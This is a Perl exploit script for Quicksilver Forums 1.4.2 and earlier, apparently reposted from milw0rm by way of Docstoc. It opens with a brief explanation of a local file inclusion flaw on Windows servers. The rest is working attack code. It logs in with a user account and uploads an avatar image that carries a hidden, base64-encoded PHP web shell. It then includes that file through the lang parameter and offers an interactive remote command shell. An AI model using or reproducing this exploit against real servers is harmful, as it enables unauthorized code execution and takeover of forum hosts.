Quicksilver Forums 1.4.2 RCE Exploit windows only

Document Sample
Quicksilver Forums 1.4.2 RCE Exploit windows only Powered By Docstoc
					                                    Quicksilver Forums 1.4.2 RCE Exploit windows only                           Page 1/5
   1    # Author:            __GiReX__
   2    # Homepage:          girex.altervista.org
   3
   4    # Date:              24/11/2008
   5
   6    # CMS:               Quicksilver Forums <= 1.4.2
   7    # Site:              http://www.quicksilverforums.com/
   8
   9    # Bug:               Local File Inclusion
   10   # Exploit:           Remote Command Execution
   11
   12   # Note:              Works with windows servers only
   13                        Works regardless php.ini settings
   14
   15   # Bug Discussion:
   16
   17   # file: global.php
   18   # lines: 318−329
   19
   20             function get_lang($lang, $a = null, $path = ’./’, $main = true)
   21             {
   22                     if (isset($this−>get[’lang’])) {
   23                             $lang = $this−>get[’lang’];
   24
   25                        }
   26
   27                        if (strstr($lang, ’/’) || !file_exists($path . ’languages/’ . $lang . ’.php’)) {
   28                                $lang = ’en’;
   29                        }
   30
   31                        include $path . ’languages/’ . $lang . ’.php’;
   32
   33   # As you can see, Quicksilver filter can be easily bypassed in windows servers
   34   # couse use of backslashes "\" in filesystem’s paths.
   35
   36   # Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting
   37
   38   # We can upload a malicious avatar and include it to have a RCE
   39
   40
   41   #!/usr/bin/perl
   42   # Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
   43   # Local File Inclusion / Malicious Avatar Upload
   44   # Coded by __GiReX__
   45
   46   use IO::Socket::INET;
   47   use MIME::Base64;
   48
   49   if(@ARGV < 3)
   50   {
   51       banner();
   52       print "[+] You need an user account to run this exploit\n\n";
girex                                                                                                           11/24/2008
                                  Quicksilver Forums 1.4.2 RCE Exploit windows only                                         Page 2/5
   53       print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
   54       print "[+] Example: perl $0 localhost /quick/ test password\n";
   55       exit;
   56   }
   57
   58   my ($host, $path, $user, $pass) = @ARGV;
   59
   60   $host =~ s/^http:\/\///;
   61   $host =~ s/^www\.//;
   62   $target = "http://${host}${path}";
   63
   64   banner();
   65   check_vuln();
   66
   67   $cookie = do_login() or debug($debug, 1);
   68   upload_avatar() or debug($debug, 2);
   69
   70   while(1)
   71   {
   72            print "[+] shell\@quick:\$ ";
   73            chomp(my $cmd = <STDIN>);
   74
   75            exit if $cmd eq ’exit’;
   76            create_socket();
   77
   78            print $sd     "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
   79                                    "Host: $host\r\n".
   80                                    "Cookie: $cookie\r\n".
   81                                    "CMD: ". encode_base64($cmd)."\r\n".
   82                                    "Connection: keep−alive\r\n\r\n";
   83
   84            $out .= $_ while <$sd>;
   85
   86            if($out =~ /−code−/)
   87            {
   88                    $_out = substr($out, index($out, ’−code−’) + 6);                     $n = index($_out, ’−code’);
   89                    $__out = substr($_out, 0, $n);
   90            }
   91            else
   92            {
   93                    debug($out, 3);
   94            }
   95
   96            close($sd);
   97            $out = undef;
   98
   99            print STDOUT "\n". $__out."\n";
  100   }
  101
  102   sub check_vuln
  103   {
  104           create_socket();
girex                                                                                                                       11/24/2008
                                  Quicksilver Forums 1.4.2 RCE Exploit windows only                        Page 3/5
  105
  106            print $sd      "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
  107                                           "Host: $host\r\n".
  108                                           "Connection: keep−alive\r\n\r\n";
  109
  110            while(my $res = <$sd>)
  111            {
  112                    $ok = 1 if $res =~ /404 Not Found/;
  113
  114                      if($res =~ /<b>Fatal error<\/b>/)
  115                      {
  116                              close($sd);
  117                              return 1;
  118                      }
  119
  120                      our $debug .= $res;
  121            }
  122
  123            print STDOUT "\n[−] Server not vulnerable, maybe it’s not a win server!\n" and exit
  124            if not defined $ok;
  125
  126            debug($debug, 0);
  127   }
  128
  129
  130   sub do_login
  131   {
  132       create_socket();
  133            my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";
  134
  135            print $sd      "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
  136                                           "Host: $host\r\n" .
  137                                           "Connection: keep−alive\r\n" .
  138                                           "Content−Type: application/x−www−form−urlencoded\r\n" .
  139                                           "Content−Length: ". length($data)."\r\n\r\n" .
  140                                           $data . "\r\n\r\n";
  141
  142
  143
  144            while(my $res = <$sd>)
  145            {
  146                    if($res =~ /Set−Cookie: (\w+)_user=([0−9]+)/)
  147                    {
  148                        $prefix = $1 unless $prefix;
  149                        $user_id = $2 unless $user_id;
  150                    }
  151                    elsif($res =~ /Set−Cookie: \w+_pass=([a−z0−9]{32})/)
  152                    {
  153                            my $hash_pwd = $1; close($sd);
  154                            print STDOUT "\n[+] Logged in with $user account\n";
  155
  156                                 return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
girex                                                                                                      11/24/2008
                                Quicksilver Forums 1.4.2 RCE Exploit windows only                                         Page 4/5
  157                     }
  158
  159                     our $debug .= $res;
  160           }
  161
  162           close($sd);
  163           return undef;
  164   }
  165
  166   sub upload_avatar
  167   {
  168            create_socket();
  169                                                            # Image content + post’s var base64 encoded
  170       my $data =    "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
  171                      "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
  172                      "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
  173                      "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
  174                      "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
  175                      "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
  176                      "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
  177                      "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
  178                      "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
  179                      "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
  180                      "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
  181                      "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
  182                      "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
  183                      "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
  184                      "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
  185                      "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
  186                      "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";
  187
  188           $data = decode_base64($data);
  189
  190           print $sd    "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
  191                                   "Host: $host\r\n" .
  192                                   "Connection: keep−alive\r\n" .
  193                                   "Cookie: $cookie\r\n" .
  194                    "Content−Type: multipart/form−data; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−−226482744623805\r\n" .
  195                    "Content−Length: ". length($data)."\r\n\r\n" .
  196                                   $data . "\r\n\r\n";
  197
  198
  199           while(my $res = <$sd>)
  200           {
  201                   if($res =~ /Your avatar has been updated/)
  202                   {
  203                           print "[+] Malicious avatar uploaded\n\n"; close($sd);
  204                           return 1;
  205                   }
  206
  207                     our $debug         .= $res;
  208           }
girex                                                                                                                     11/24/2008
                                   Quicksilver Forums 1.4.2 RCE Exploit windows only                                             Page 5/5
  209
  210             close($sd);
  211             return undef;
  212   }
  213
  214   sub create_socket
  215   {
  216            our $sd = new IO::Socket::INET( ’PeerAddr’ => $host,
  217                                                                                                    ’PeerPort’ => ’80’,
  218                                                                                                    ’Proto’     => ’tcp’,
  219                                                                                               ) or die $@;
  220   }
  221
  222   sub debug
  223   {
  224           my $output = shift;
  225           my $errno = shift;
  226
  227             open(DEBUG, ’>’, ’debug.txt’);
  228             print DEBUG $debug;
  229
  230             if($errno eq ’0’)
  231             {
  232                     print STDOUT       "\n[−] Unable to request index.php! See debug.txt for more infos\n";
  233             }
  234             if($errno eq ’1’)
  235             {
  236                     print STDOUT       "\n[−] Unable to login! See debug.txt for more infos.\n";
  237             }
  238             elsif($errno eq ’2’)
  239             {
  240                     print STDOUT       "\n[−] Unable to upload avatar! See debug.txt for more infos.\n";
  241             }
  242             elsif($errno eq ’3’)
  243             {
  244                     print STDOUT       "\n[−] Exploit mistake! See debug.txt for more infos.\n";
  245             }
  246
  247             close(DEBUG);
  248             exit;
  249   }
  250
  251   sub banner
  252   {
  253           print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
  254                                         "[+] Local File Inclusion / Malicious Avatar Upload\n".
  255                                         "[+] Coded by __GiReX__\n\n";
  256   }
  257
  258   # milw0rm.com [2008−11−24]


girex                                                                                                                            11/24/2008